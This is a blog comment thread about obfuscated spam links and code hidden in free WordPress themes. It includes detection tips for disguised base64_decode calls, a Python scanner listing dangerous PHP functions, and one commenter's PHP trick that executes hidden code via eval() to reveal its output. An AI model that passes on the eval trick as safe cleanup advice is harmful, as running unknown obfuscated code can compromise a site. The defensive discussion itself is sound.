@Caspar You make an interesting point about things that are “free.” There are loads of themes that are free and reputable, you just shouldn’t use Google to look for them. Whenever I use a free theme I always go straight to the source and always credit the designer. Many theme developers will release themes that have been pet projects. Others are released by commercial companies who want to either raise their profile or increase support memberships.
A lot of the themes that are being given away “for free” are released under the Creative Commons license, instead of GPL. This is controversial in itself as WordPress, which a theme needs to run, is GPL.
It’s an interesting issue though and a great idea for another post. Are the best things in life (or WordPress anyway) free? There’s lots to be said about it so I think I’ll address it in a post next week :)
@Inspirations – SimpleFolio is a free theme that was released by the very reputable Smashing Magazine. If you downloaded it directly from them you shouldn’t have any problems. If you downloaded it from elsewhere then you might. If in doubt download the TAC plugin and check it out: http://wordpress.org/extend/plugins/tac/
Thanks mate as a relative newcomer to the whole WP development scene I’m very appreciative of the heads up. Too much SEO and Spamware focused crap on the net for my liking.
By the way: When examining a theme or a plugin one should look for ‘strrev(“edoced_46esab”)’, too. The ‘strrev() function’ reverses a string: ‘edoced_46esab’ is ‘base64_decode’ the other way round. Spammers do this to hide encrypted code from common detection methods that focus on keywords like ‘base64_decode’. That’s my (bad) experience.
I have tweeted this post, it’s very nice to see that in fact most of the themes for WordPress are corrupted by this encoding. If you decode and take this code out of the footer, is it clean?
Why even use wordpress at all?
It’s a security nightmare and the really bad performance speaks for itself.
Very nice post on WordPress. I wanted to write the same thing for French people because I’ve seen the same thing when I explored the web.
@n:
Pop quiz: name one in-the-wild exploited security vulnerability in WordPress.
(Do please try to constrain your reply to security vulnerabilities from the past year or two.)
Hurry; the clock’s ticking. Let’s see if you can prove that you’re not just spreading FUD.
Chip
@n Why use WordPress at all? WordPress is only ever a security nightmare if people use it in the same way some people use a computer without a firewall or anti-virus. Any piece of software becomes less secure if people use it irresponsibly.
There are lots of simple steps that you can take to improve your WP security:
http://wpmu.org/wordpress-security-101-8-tips-tricks-and-tweaks-to-secure-your-wordpress-website/
http://www.smashingmagazine.com/2010/07/01/10-useful-wordpress-security-tweaks/
Downloading WordPress themes from random spammy websites is the equivalent of using Google to find a piece of software rather than going straight to the source.
Good security comes down to how WordPress is implemented by its users, not the platform itself.
A great article which will hopefully be re-tweeted by thousands to raise awareness of this problem. The more of this rubbish we can keep away from people’s WordPress installations the better. Let’s hope we can raise awareness amongst those who are just discovering and using WordPress in anger.
Keep up the good work Siobhan :-)
It’s not encrypted, it’s encoded. Big difference.
@Siobhan Just to clarify: I hope it came across, I’m in no way against anything related to the open source idea and “free software” like WordPress! Looking forward to that post of yours. ;-)
Superb post. Interesting, informative and somewhat entertaining too. I’m shocked that almost everything on the first page of that Google search proved dodgy.
How long did you spend doing this? I mean, holy CRAP! The sad thing is that it never dawned on me that themes could be malicious until I read this.
Phew! Glad I got my theme directly from the guy who wrote it.
Shouldn’t the verdict be safe: 2. Because although one theme site contained out of date themes there was nothing wrong with them.
Good article though. People should also scan their own themes once in a while. For example: my always up to date WP.ORG installation has been infected 2 times in the last year with base64 encoded malicious code infecting visitors!
Great article, the exact reason why I use Studio Press for my wordpress sites… I retweeted this on Twitter, so hopefully other Wp users will be informed too.
amazing post! i love the amount of research you’ve done on each site. i would’ve never known that these free themes contained anything malicious (poor innocent me!)
thanks for the info :)
Great job! But it’s not a news, don’t touch WP if you’re not a coder.
Fascinating article. Thanks for the read. I knew some sites hide code in their themes and have come across it a couple of times before. I just didn’t know the extent of the problem.
Great article! Sometimes free isn’t what it’s cracked up to be :)
When I choose a free theme, I always browse the source code and if something seems not clean, I do not use the theme. While many free themes only include backlinks in order to boost the netlinking and the SEO of external websites, sometimes the code is more dangerous (hacking purposes…)
Amazing amazing post. I am actually shocked that 8 out of the top 10 have malicious code in their themes. I’ll be sure to share this post with my clients!
Thanks again
Siobhan,
Great post – and always a timely subject.
A note on those encoded links. I’d lay money on them being trojan downloaders – which essentially means, in their case if they are, that you’d be aiding a criminal ring if left there. Same goes for the music downloads site. Long term bad news with Google too (bad link neighborhoods).
(I’d not advise visiting the anti-virus links to find out short of doing so in a virtual machine)
What do you think about Theme Forest?
That was a very insightful article. Thanks! Nowadays, not only wordpress themes, blogspot themes also contain unnecessary scripts for hiding ads (some ads displayed only on mobile devices) and external links.
Seriously one of the best articles I’ve ever read. I’m guessing Jay from an earlier comment probably works for one of these companies, because to accuse this post of being shoddy is insulting.
Although these aren’t guaranteed to contain malicious content, just the fact that something is being hidden is enough to warrant suspicion. If only Google had a way of penalising them.
Good article. For some time now I have been buying my themes (Pagelines or Thesis) – the good thing with this is you get quality, you can get that with free themes as well, but you also get support and regular updates :)
My concern is with google – my question: is google good enough? I think it too hard to get through all the crap if you create original stuff.
I try to publish original iPad wallpapers but the most successful sites are those copying others work (legal or illegal) – weird!
Great work, I have passed this on in my Mozilla Peer2Peer class on WP, thanks again! Oh, I enjoyed your writing style too!!!
@Michael I’ve not downloaded from Theme Forest but I’ve never heard of any complaints about them. I’ll email them to ask them about their review policy.
@Martin Yeah, it’s a good point about Google. I’ve emailed Google’s press office and tweeted @mattcutts to see if they have any thoughts on the matter.
Google ask people to report spam and paid links:
http://www.google.com/support/webmasters/bin/answer.py?hl=en&answer=93713
Google consider the following as spam:
“Hidden text or links. Some webmasters hide links or text on their page with the intention of deceiving search engines about the nature of the content on the page. For example, a casino site could stuff its pages with hidden text such as “labradors, labs” with the intention of tricking search engines into sending dog lovers to a casino page. ”
This means that if you’ve got a theme containing hidden links or text this will negatively affect your SEO.
If you’re downloading from any of these sites you’re not only opening yourself to malware, malicious attacks and spammy links but it could have a detrimental effect on your SEO. Ouch! Not really worth it, is it?
I’m going to follow this post up with something nice on places you should go to for free/cheap themes. If anyone has any recommendations let me know! Either post here or tweet me @SiobhanAmbrose :D
Good interpretation and well written, thank you for this article well detailed.
Thanks for taking the time to research and create this excellent blog post. I have only used the free themes from wordpress.org so far; but now I will know to be careful before considering the rest.
An easy way of removing the toughest encrypted PHP code is by using the ob_start(), ob_get_content() and ob_end_clean() PHP functions.
E.g.
ob_start();                          // start buffering output instead of sending it to the browser
eval(blahblahblahblahblahblahblahblahblahblahblahblah);  // the obfuscated code, whatever it outputs is captured
$c = ob_get_contents();              // grab what it produced
ob_end_clean();                      // throw the buffer away
echo '*start*'.$c.'*end*';           // print the decoded output between markers
Then take a look on your site, check out the source and look for the *start* and *end* words. Copy everything in between and remove the junk links. Then replace the eval in your code with the new unencrypted version.
Granted it’s a little involved, but worth it for a good theme I think.
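As an added example (my own code, not the post’s or any commenter’s), the Python script below does two things the thread discusses: it flags the strrev(“edoced_46esab”) trick mentioned earlier, alongside the plain keywords, and it peels base64 layers statically so you can read the hidden links without running the theme’s code at all, which is the safer counterpart of the ob_start()/eval() capture above. The footer it scans is constructed inline for the demo, and spam.example is a placeholder host.

```python
"""Static triage of an obfuscated theme footer (added example, not the
page's own code): flag the hiding tricks discussed in the comments and
peel base64 layers without ever executing the hidden PHP."""
import base64
import binascii
import re

# PHP functions that spammers hide, reverse or encode to slip past scanners
# that only grep for the literal string 'base64_decode'.
_DANGEROUS = {"base64_decode", "eval", "gzinflate", "gzuncompress",
              "str_rot13", "assert", "create_function"}

# strrev('edoced_46esab') and friends: capture the literal so we can reverse it.
_STRREV = re.compile(r"""strrev\(\s*['"]([A-Za-z0-9_]+)['"]\s*\)""")
# A quoted run of base64 alphabet long enough to be a payload, not a word.
_B64_LITERAL = re.compile(r"""['"]([A-Za-z0-9+/]{40,}={0,2})['"]""")


def find_suspicious(src: str) -> list[str]:
    """Return a label for every hiding technique spotted in the PHP source."""
    hits = []
    for name in sorted(_DANGEROUS):
        if re.search(r"\b" + name + r"\s*\(", src):
            hits.append(name)
    for match in _STRREV.finditer(src):
        real_name = match.group(1)[::-1]   # undo the reversal
        if real_name in _DANGEROUS:
            hits.append(f"strrev->{real_name}")
    return hits


def decode_layers(src: str, max_layers: int = 5) -> list[str]:
    """Peel nested base64 literals statically and return each decoded layer.

    Unlike the ob_start()/eval() trick, nothing here is executed: a layer is
    only accepted if it decodes cleanly to UTF-8 text.
    """
    layers = []
    current = src
    for _ in range(max_layers):
        decoded = None
        for match in _B64_LITERAL.finditer(current):
            try:
                decoded = base64.b64decode(match.group(1), validate=True).decode("utf-8")
                break
            except (binascii.Error, UnicodeDecodeError):
                continue          # not really base64, keep looking
        if decoded is None:
            break
        layers.append(decoded)
        current = decoded         # the payload may itself hide another layer
    return layers


# Constructed sample footer.php, built here for the demo; it is not taken from
# any of the themes reviewed in the post. The hidden payload is a spam link.
_HIDDEN_PHP = 'echo \'<a href="http://spam.example/">cheap things</a>\';'
SAMPLE_FOOTER = (
    "<?php\n"
    "$d = strrev('edoced_46esab'); // becomes base64_decode at run time\n"
    'eval($d("' + base64.b64encode(_HIDDEN_PHP.encode()).decode() + '"));\n'
    "?>"
)

if __name__ == "__main__":
    print("techniques:", find_suspicious(SAMPLE_FOOTER))
    for depth, text in enumerate(decode_layers(SAMPLE_FOOTER), start=1):
        print(f"layer {depth}: {text}")
```

Run it against a real footer.php by reading the file into find_suspicious() and decode_layers(); a theme that uses none of these functions returns an empty list from the first and nothing from the second.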
Did you find any ‘malicious code’ in any of these themes?
Always beware encoded text in footers, eh?
It is NOT a violation of the WordPress trademark to use the term in a url any more than using it in the headline of an article would be a violation.
HOWEVER, using it in a domain name IS a violation of the WordPress trademark which means that WordPress could take action against the top two sites in your list and have their domain names revoked. So why isn’t WordPress acting to protect their trademark and the community?
Thanks Siobhan. I have to admit that I had never considered that Templates could contain such malware …. I use them but always reprogram them. I shall look a little closer next time to see if my favourite themes and designers do this.
Wow, that was a lot of work. I’ve come across all of those sites and didn’t even stop to consider whether the themes might have malicious code.
I completely agree with your assessments. I can’t think of a single valid reason to have encrypted code inside a WordPress theme, seeing as the code is supposed to be GPLed.
@Jim Wow! That is a powerful point. I guess that’s why some sites use “WP” or “WPMU” instead. But I never even thought about that one. I wonder if WordPress has even thought about pressing the case against those sites.
This is a great post very detailed. It is better to get your free themes that are listed in wordpress. I have had my troubles finding the perfect theme when I began blogging, I spent hours looking, installing, then uninstalling, and sometimes getting errors.
There are some good free themes, but they did not have everything I desired. I know that I like freedom in customizing my themes.
The back-end on some of these free themes is not always great, I am always wanting more in features. And some of them offer free themes to entice you to buy their premium ones.
I have bought a premium theme that has tons of features in the back-end. I use it on a few of my blogs. It can be a little confusing to look at the back-end with so many features and various ways to customize my site, but I do find it useful to be able to create a theme that looks great, that flows well, and I enjoy the freedom.
I did have some errors in my search. I think that some people may have even stolen the code from some other themes. Because some sites offer free themes where you may see the same theme at a price.
You may be hesitant to buy a premium theme, but it is worth it. You can also find a coupon code on the web that can reduce the price.
Thanks for sharing. I knew this. but I never bother to figure it out what is base64 code in the footer. Gonna be more careful when downloading themes.
Excellent post, really.
But I miss one point here. How does Google read those encrypted links? I guess it doesn’t? So what’s the point of inserting them there?
How odd. I must have skimmed right over the title in my initial read. It seems designed to generate controversy. And I just can’t agree with it.
I own and operate http://webstylee.com, where I’ve released a slew of free themes developed using Artisteer. While most of the themes look like they’re from the 1600s or maybe a little later ( ;) ), they’re nonetheless perfectly safe, as I made them myself.
Given that the site can be found via Google, it and WordPress.org defeat your mean and evil title. Once again, good triumphs over evil! Mwahahaha! Or something like that.
Oh wow, OK that really does make a lot of sense dude.
http://www.being-anon.it.tc
@DavidM:
But then, Artisteer presents problems of its own. According to the current Artisteer datasheet, the application only supports WordPress versions 2.5 – 2.7 (March – December 2008), which means that Artisteer-generated Themes are going to be woefully out-of-date with respect to WordPress functionality, and may present any number of issues due to use of deprecated function calls.
Do yourself a favor, and take the next step by freeing yourself from relying on Artisteer. It wouldn’t be that difficult, your Themes will improve, and your users will thank you. (And as a bonus, you’d be able to submit your Themes to the WordPress Theme Repository – should you so choose.)
I’ll even offer to help you, if you’d like!
(p.s. kudos to you, for properly applying the CC-Att license to your Themes without requiring public-facing attribution links! It’s refreshing to see someone not abusing/mis-applying that license.)
Thanks for a really informative and eye-opening article. Much appreciated.
@Jim Good point Re: trademark. I’ll update the post to take account of your comments. Here’s the ref if anyone else is interested: http://wordpress.org/about/domains/
@netgui – I don’t know how Google deals with the encoded links. I suspect that the crawlers do pick them up and sites will rank for them, otherwise there’s no point in them at all.
I’m still waiting to hear back from Google but if I do (fingers crossed) I will report back!
@DavidM I’d like to stress that I’m definitely not making the point that all free WordPress themes are bad. I always use free themes for all sorts of projects. The point is that the top ranking websites for free WordPress themes contain encoding. I’m afraid that your own website doesn’t disprove that – I couldn’t find it on the first ten pages of Google.
It’s great that there are sites out there with free WordPress themes for people to use. It’s just incredibly frustrating that they can’t hit the first few pages of Google because these spammy sites are so incredibly good at SEO. It would be great if the WP community could somehow get legitimate sites (like your own) to the front page of Google, instead of these types of websites.
P.S. I would take Chip up on his offer – it’s a good one!!!
@netgui/Siobhan:
Google will never see the links as encoded, but rather only as un-encoded cleartext. Google doesn’t see the underlying PHP files, but rather only the HTML generated from these PHP files by the web server’s PHP parser. The PHP parser takes the PHP file, executes the eval( ‘crap here’) or whatever, and outputs the result.
Basically, Google sees whatever you see if you view-source of a given web page.
@ Chip Bennett:
Regarding Artisteer themes becoming outdated, that’s just inevitable given the rapid nature of WordPress development, but it actually appears to support WordPress 3.0 very well currently, which really only accounts for the menu system.
Sadly, almost all the themes on the Web Stylee site were made pre-WordPress 2.8 so they don’t have the menu functionality. And I don’t think anyone in their right mind has the time to update 200+ themes. :)
I’m working on my own theme framework currently and generally could use informational help to expedite the process so I very much appreciate the invitation. It seems we also share a love for Scripture so I’m sure we’ll be talking a bit more on your blog.
@ Siobhan Ambrose:
I do hope you realize the tongue-in-cheek nature of my comment. I’m rarely to be taken seriously and I very much enjoyed your post. In fact, Web Stylee isn’t really to be taken too seriously either. I was sort of hoping people would end up visiting for the humorous slant behind it all.
@DavidM:
I’ll be happy to help in any way that I can! One of the reasons that I got involved with the WP Theme Review Team was to help more people learn how to develop WordPress Themes. I’m no expert on Frameworks, but feel free to ask away with any questions that you have!
(By the way, once you have your Framework, and a good default Theme, you could very easily take any or all of your Stylee Themes and convert them into Child Themes. Almost every single one can be implemented with CSS changes only.)
Hi Chip, I just stumbled upon your comments. As one of a small minority of landscape designers committed to ‘the art of eco-friendly gardens’ (the tag line of my business, Indigenous Landscape Design Australia), I’ve decided to stop designing individual gardens. Instead, I aim to earn my income online, by informing/teaching/empowering garden owners, landscape contractors, and other landscape designers, how to achieve beautiful gardens without compromising ecological integrity.
My online business course mentor, Greg Habstritt (I can highly recommend him: SimpleWealth.com), uses and recommends OptimizePress. But one of my favourite websites, Copyblogger, uses and recommends Genesis. I’ve researched them both, and can’t decide between them.
I gather that Optimize is customized for (would-be) online marketers like me, whereas Genesis is designed for bricks-and-mortar businesses too. And their otherwise impressive Prose Child Theme, is for blogs rather than full-blown websites.
Your valued advice would be greatly appreciated. Thank you, Gordon
The scariest part of this article is that the title could be “Why You Should Never Search For Free WordPress Themes, desktop backgrounds, screensavers, etc, etc , etc…”
The unscrupulous will always find a way to exploit free.
Great article, Siobhan.
I’ve retweeted it and will pass the information on.
Thanks!
Wow, great tips and very good analysis. I’ve always been a fan of free and often tell friends or clients to go to Google to search for free wordpress themes for their blogs, but I’m going to stop doing that right away and go back to check all of my blogs to see if there are any of the things mentioned on this post. It’s sad to see how much people are exploiting WP themes, but I guess when you try to offer something for free you want to get something in return for it. However, the way these sites are going about it is completely wrong.
Great article. There’s something unsettling though: one of the themes is by Brian Gardner. Isn’t he the creator of the premium StudioPress themes?
It’s probably a knock off or unauthorized. Brian Gardner is a reputable designer.
@sha that’s one of the issues. Since open WordPress themes are licensed for free redistribution, anyone can take a theme and modify it (with good or bad intent) and redistribute it. So, the fact that the original designer is reputable doesn’t mean you can trust his/her theme when it’s redistributed by a third party.
this is good stuff. wish I had even known it existed since I have fallen prey to at least 5 bad themes, and just thought it was me, not knowing WP. dern. I feel dumber than usual. Anyway, thanks for the education. Going to spring for a custom site now from someone.
kenn
Excellent piece, Siobhan! A good lesson in being aware of the sites one downloads from. I agree that most people will just search for free WordPress themes (I have done so on many occasions) and I’m glad you’ve pointed out the dangers.
Will a review of the top 10 yahoo searches be next?
@Siobhan Ambrose, Thanks for the link for the TAC WordPress plugin. It did give “Simplefolio” a clean sheet. Yes, I downloaded “Simplefolio” following the links from “Smashing Magazine”. I am a bit relaxed now.
Thanks for the info. This opened my eyes.
Also plugins contain base64 code. For example, the WPTouch plugin:
/plugins/wptouch/js/fancybox_1.2.5.js:12
I wonder why…
@Jim Yep, I’m aware. It’s just that I remember being told that the StudioPress themes aren’t encoded in any way.
@Claude Didn’t know about WPTouch. Damn.
This actually quite annoys me.
These links are the only way free theme designers can make anything from the themes. Often, it’s their only source of income.
Using Base64 to encode links is fine – NOT ALWAYS MALICIOUS
@James Patterson.
If it’s a free theme, how are you making money? By installing the codes and links? That’s garbage!
No one wants to use a theme with code hidden in it.
IF you require advertisers’ links to stay on the theme, then at least be honest about it.
It’s the dishonesty, assuming that people won’t know any better, that breeds the mistrust, because if you will slip that in on people, what else will you try in the name of a dollar?
This the very reason that I never use free themes, and that I steer everyone I know away from using them.
Don’t blame the messenger, you guys screwed yourself.
@James Paterson,
If a theme designer can only make money including link-backs in their themes, they’re in the wrong line of business. A theme designer by trade should be able to make more than just free themes. Free themes are simply a promotional tool.
More than that, can you give us one legitimate use of encryption in a free theme? Remember, WordPress theme code is supposed to be GPL because of the WordPress license. One reason is all we need to consider whether it’s “fine” or not.
I am quite new to WP, but having started a new WP blog, my first effort was to find a free WP theme that suits my requirements. Having found them, and installed them, I encountered some of the problems explained here. I searched around and found some answers and wrote a post on 25th December. Now I find that the problems are much more serious with some of the WP free themes. My post on the problems I faced can be found here: http://tech-sharing.com/2010/12/harmful-hidden-codes-in-free-wordpress-themes/
Anyway, thanks for this well-researched article, which I will revisit and use as a guide for myself and others, especially beginners like me.
@Siobhan, you mentioned that you tested 10 sites but I only see 9 of them that were actually tested. You make the assumption that themes from wordpress.org are safe but yet just two months ago you showed that assumption to be false.
I agree though that encoded lines are questionable and I stay away from them.
@drmike
I don’t see anything in that previous post that refutes the assertion that Themes downloaded from the WordPress Theme Repository can generally be trusted to be free of malicious code. Can you clarify?
Base64 encryption! OH NO!!
What about if we search for wordpress themes from the themes section of our wp control panel? Will the free themes we get there be safe for use? Will these themes be checked by wordpress people to be free from malicious and unwanted code?
Thanks for this eye-opening article. It is really disgusting to see how we are being taken for a ride by these template sites.
I don’t think this is generally a serious problem. And I don’t agree that the themes are all crap. I’d say maybe 85-90% of them are crap.
When I run into code in the footer, I generally just copy the HTML output and paste it back into the footer. This allows me to make the links a little less obvious by adjusting the color.
I have recently purchased the Thesis Theme and build all my sites on that, but for 2-3 years, I was living almost exclusively off free WP themes with no apparent damage.
c-
Wow Siobhan
This is some post that you’ve put together.
I don’t pretend to understand the coding involved and I’ll probably never know what a base64 thingy is, but I can see from your super duper detective work that these are very bad themes.
Thanks for highlighting the problem and pointing us in the direction of free trusted themes.
Eye opener!
As usual, the best resolve is to break down and buy a premium theme. I would never use the garbage available for free download on WordPress.org, nor should anyone who values good, credible web design!
Hello
Perfect article !
Thanks
Hi all,
In an effort to convince you that you can still find great free WordPress themes, I’ve written a post about just where you can get them:
http://wpmu.org/when-is-a-free-wordpress-theme-really-free-some-thoughts-and-some-places-to-find-them/
:)
Awesome tips. I have been using a free theme for a long time. I have to check whether it is malicious or not. Super like. Thanks buddy.
Fantastic research to drive the message home that one cannot search and download free WP themes, which I’m sure happens all the time. I have posted your message with a link to the full article on my site. Thanks
What a great and helpful article. I have had this issue with a client I used a template that had ‘dodgy’ links at the bottom that linked to porn sites which I managed to decrypt. I have found templates that the decrypter didn’t work on.
You assume the first page Google results are safe to use, how wrong you can be.
I now use blank themes or frameworks to create my themes, which work a lot better.
Super article! I’ve had this problem before, but never investigated it to this extent. Thanks!
This was extremely interesting, thanks!
But how about finding out you’re using a tainted theme… and then clean it? I just did exactly that (once you’ve decoded the encoded part, it’s easy to figure out what to do), but I’m not sure where I stand now about the licence. Since they didn’t have the right to taint it… do I have the right to change it?
Some great research and a well written summary of where not to look for free code!
Pingback: SpeedLink 1 – Weekly roundup of relevant stuff out there
Pingback: Why You Should Never Search For Free WordPress Themes in Google or Anywhere Else – WPMU.org — CollinCondray.com
Pingback: Why You Should Never Search For Free WordPress Themes in Google or Anywhere Else – WPMU.org « Collin Condray's WordPress.com Blog
Thank you Siobhan – This eye opener is much appreciated.
-Chris, Mumbai, India
Pingback: Free Wordpress themes coming with a price « Wobbits
Thing is that free WP themes are a big link-selling business these days. So it’s most likely not malicious code hidden there, but simply links to some unrelated 3rd parties who bought the link from the theme author or distributor of the theme. Base64 is there just to stop you from deleting it easily (which you have every right to do according to WP Themes general license terms… themes have to be open-sourced).
Pingback: 37prime.news » Free WordPress Theme, a lesson in security.
Pingback: Free WordPress Theme, a lesson in security. « 37prime
nice article thanks !
Pingback: New Wordpress theme suggestion
Pingback: SitePoint Podcast #96: The Plug-in Wars | PHP Podcasts
Pingback: Wordpress : faites attention à la provenance de vos thèmes ! | Airdecker
Very nice and professional article. very clear information let me stay away from free wordpress themes.
You need to get these sites removed from Google’s results then.
http://googleblog.blogspot.com/2010/12/being-bad-to-your-customers-is-bad-for.html
They’ll remove them because obviously their whole goal is to poison google.
http://googleblog.blogspot.com/2011/01/google-search-and-search-engine-spam.html
Wow, super article! Thanks for the huge heads-up!
Pingback: The obsolescence of web designers « Dot Com Disaster
Really interesting investigation… probably partly intuitive from the get go, eh? Free is not always REALLY free. Even paid WordPress Themes are not all problem free. I used a one-theme.com theme once and discovered problems in the scripting and the “support” is non-existent. The 1 Theme folks take in your subscription bucks, but they are definitely not home. It’s kind of like a ghost site! The scripting problem could be fixed, but it was not worth the effort when there are themes you can start with that are problem free as you so adeptly pointed out!
Pingback: Daily Blog Soup
Pingback: how about the fate of flash ?
Interesting read and I’m glad to have read it. Having given it little thought in the past, I will be far more paranoid going into the future. Guess this post could also apply to plugins that aren’t from the official WordPress site as well. Thanks!
Pingback: What is the best Wordpress theme from the point of view of SEO? - Quora
Wow that’s some amazing research, these people are evil.
Great post.
However, a neat trick to easily see / remove the footer Base64 coding is:
- Edit footer.php in WordPress by adding some text (above all the rest in the footer). Save it.
- Open the page in your browser, right-click & view source code, copy the text below your added footer text.
- Go back to footer.php in WordPress, paste what you copied and edit as you wish; it will not show the crap links anymore, and you’re sure you don’t mess up the theme.
grtz
Pingback: Miasik.net » Niebezpieczne motywy
Pingback: Niebezpieczny kod w szablonach - polska skórka
Really informative stuff, I paid for my wordpress theme, but I guess that doesn’t automatically make it safe. I’ll be following this up with a bit of digging of my own
Thank you!
Pingback: furiousBlog – in my diatribe » Blog Archive » crummy
Pingback: Extraordinarísimo » Blog Archive » Cuidado con los temas gratis para Wordpress
Have you reported them to Google yet? They could get blacklisted.
Pingback: Using stuff you find online | Megan @ Elon
Thanks! Really useful. Amazing post. Everyday they find new places to hide the sh**
As the previous comment said, reporting to Google would be a good idea.
Pingback: Ne jamais télécharger de thèmes Wordpress gratuits via Google - Pressimi
Who knew there’d be so much ugly in these search results? While I don’t see much of a point for free themes unless it’s for a private site, I would like to amend one additional thought: The people who release these themes free of charge use them to raise their profile. Unauthorised re-release, with or without modification, is really hurting their cause. Their name is usually cut off somewhere or bloggers might blame shifty links on them. I would always recommend either getting themes from their sites directly or from wordpress.org and support the authors if you can.
The “globalEval” snippets that Exploit Scanner picks up are from jQuery, which is perfectly safe and running on this very blog.
Wow, I didn’t know that! Is there an easy way to check a template for evil code? Maybe some tool?
Pingback: Be Cautious When Searching For Free WordPress Themes | Lifehacker Australia
Pingback: Be careful with free WordPress themes
Thanks for this great article – looking forward to sharing with colleagues and clients!
Further proof that money spent on a reputable premium theme with full support from its developer is a worthwhile investment.
Excellent resource!!
Pingback: Fair warning about free Wordpress themes « rhetoftw
Pingback: links for 2011-01-24 at DeStructUred Blog
Pingback: links for 2011-01-24 « Michael B. Duff
Pingback: web design stuff, portfolio - this is a studio blog
Dreamt last night that I was given a micro pig and kelly osbourne was my sister and picked me up from work on a bus hahaha
Pingback: Careful of those free WordPress themes! | CNW Iowa Divison in HO Scale
I like your free report, awesome post.
Thanks!
Pingback: Tech Thoughts Daily Net News – January 25, 2011 | Bill Mullins' Weblog – Tech Thoughts
I took a long time to come around to the premium themes idea – it was when I realised I was endorsing Casinos and dodgy mobile phone companies.
Try explaining this to people when they first blog and it’s difficult for them to understand, in future I shall just send them here to read this.
Pingback: Searching For Free WordPress Themes? Caution Advised — Jim F Munro
Pingback: Be Cautious When Searching For Free WordPress Themes by Facebook Theme
Pingback: Network Security Podcast » Blog Archive » The Network Security Podcast, Episode 229
Pingback: this n that | What's that you said?
Pingback: 008 – Never Google Search for Free WordPress Themes
Congratulations for this amazing post.
Very helpful.
I’m gonna RT it immediately.
Just telling you the link for “Other codes” is broken.
Now I bookmark your website ;)
@lordsweetdragon
This article really helped me. I’m a new WordPress lover and still learning how to build a new template. So far I always modify free WordPress themes, and now after I read your article I should be more careful choosing a free theme before modification.
Thanks
You are 100% right. Just last year, in December, I downloaded a virus from a free theme site, before I had a chance to download the theme. So, please be careful.
Pingback: Como procurar Temas WordPress gratuitos
Thanks for the information. I never thought about that. Very informative article. You rock.
Thanks for this article – I found a chunk of Base64 which concealed some questionable links at the bottom of one of my MagPress free themes.
Pingback: Theme Authenticity Checker | Savage Lullabye
Pingback: Dangers of Free WordPress Themes | JarvisWP (for Wordpress)
Pingback: Warning! Free wordpress themes may contain malicious code! « Website Design Australia
I read your article, it’s very informative and useful for me and others too…
Pingback: 4 Reasons to Spring A Few Bucks For That Premium Wordpress Theme | 香港新媒體協會
Pingback: Why You Should Never Search For Free WordPress Themes in Google or Anywhere Else | WordPress, Multisite and BuddyPress plugins, themes, news and help – WPMU.org | Eric Young Online
Pingback: Why You Should Never Search For Free WordPress Themes in Google or Anywhere Else | WPMU.org | Eric Young Online
Pingback: Trust is key to avoiding a bad WordPress theme — NevilleHobson.com
Gil, thanks for writing such an informative article. I am going to refer my peers and colleagues to your post today. Well done!
Patti Collins
Great information. When I saw the title, “Why You Should Never Search For Free WordPress Themes in Google or Anywhere Else”, I got curious and read the article, and learned a lot.
Thank you
http://discounttools4sale.com
Wow, super article. The top searches in Google for “wordpress themes” are a real pain in the ass. That’s why I have preferred this site.
Pingback: from Global Guerrillas: “Cell Phone Coordination of Open Source Protests” and Cyberculture roundup | Erkan's Field Diary
Siobhan
I came over to reply to a comment but replying is not so easy without threaded comments.
Is there any reason that you don’t use threaded comments?
Pingback: Network Security Blog » Network Security Podcast, Episode 229
Pingback: How Social Media Changes Everything* | SeoDigerati.com
Pingback: Advantage for using Wordpress theme | jumistor.com
Pingback: Temas para WordPress podem ter código malicioso
Pingback: Wordpress Advice of the Month: Why Free Themes are EVIL
Pingback: Temas para WordPress podem ter código malicioso | Pipoco
Pingback: How Social Media Changes Everything* | Global SEO Solutions Blog
Pingback: >4 Reasons to Spring A Few Bucks For That Premium Wordpress Theme | technews
Pingback: Slain by the theme « Lavonardo
Pingback: How Social Media Changes Everything* « Designs By Brian
Hi, this article is awesome. I would like to know if you mind if I make a translation (including all copyrights, of course :)) to publish on my blog… is that ok?
Thanks in advance for your answer!
Pingback: LunarNews – February 2011 | web-hosting-newsletter.com
@alt Sure, please do a translation. Can you let me know the link when it’s done? :)
Pingback: Profrssional Wordpress website development | Websites for users to update and edit
Actually, if you know a bit of coding you can inspect the theme yourself to find encrypted PHP code in footer.php (mostly).
Otherwise you can use the TAC (Theme Authenticity Checker) plugin.
Pingback: Why You Should Never Search For Free WordPress Themes in Google or Anywhere Else | Eric Young Online
Pingback: Attention à la sécurité avec les templates Wordpress gratuits ! | Univers Network - Toute l’actualité sur le réseau et bien plus encore…
Is there any reason you don’t use threaded comments?
Pingback: Why You Should Never Search For Free WordPress Themes in Google or Anywhere Else | Eric Young Online
Pingback: Why You Should Never Search For Free WordPress Themes in Google | Eric Young Online
I’m glad I came across this. I did not know that about free WordPress themes; Base64 is new to me, and I will look for it from now on. I wanted to know, I have been having problems with themes since I upgraded my WordPress, do you know why? I can’t install any new ones.
Pingback: Genesis Theme Review « Wordpress for Websites
Pingback: Daveo Concept | Il ne faut jamais chercher un thème WordPress gratuit sur un moteur de recherche
Pingback: The Web Column: Issue No.4 — L'Alpiniste
Amazing post Siobhan! You did a fantastic job. I guess you must have spent a lot of time bringing all this information together. I usually avoid freebies in general, but in the first 2 months after I launched my blog I was using some free themes. Now I’ve got Thesis. Thanks again for your contribution.
Pingback: Isn’t it time the WordPress foundation started protecting the trademark in domain names? I think yes… and here’s how we can help! | WordPress, Multisite and BuddyPress plugins, themes, news and help – WPMU.org
Very informative article, thank you sharing it. I never thought about that. Patrik
Pingback: Inside Trileaf Designs – Problems with “Free” Wordpress Themes « TriLeaf Designs
Pingback: SFCite | Blog | Isn’t it time the WordPress foundation started protecting the trademark in domain names? I think yes… and here’s how we can help!
Pingback: Temas para WordPress podem ter código malicioso | Variedades
Pingback: Shoestring Budget SEO Tips for Small Businesses | Aitir Google Lab
Pingback: Shoestring Budget SEO Tips for Small Businesses | Global SEO Solutions Blog
Pingback: Why You Should Never Search For Free WordPress Themes in Google or Anywhere Else | WordPress, Multisite and BuddyPress plugins, themes, news and help – WPMU.org | [my] Comunicação
Pingback: Shoestring Budget SEO Tips for Small Businesses | Advertise Your Service
Pingback: Shoestring Budget SEO Tips for Small Businesses « Designs By Brian
Pingback: Shoestring Budget SEO Tips for Small Businesses | Search Engine Ads
Pingback: Shoestring Budget SEO Tips for Small Businesses | Click Through Rate
Pingback: Shoestring Budget SEO Tips for Small Businesses | Online Advertising Services
Pingback: The dangers of searching for free WordPress themes on Google
Pingback: Über die Sicherheit von WordPress-Themes und -Plugins @ techblog – Technologie für Menschen
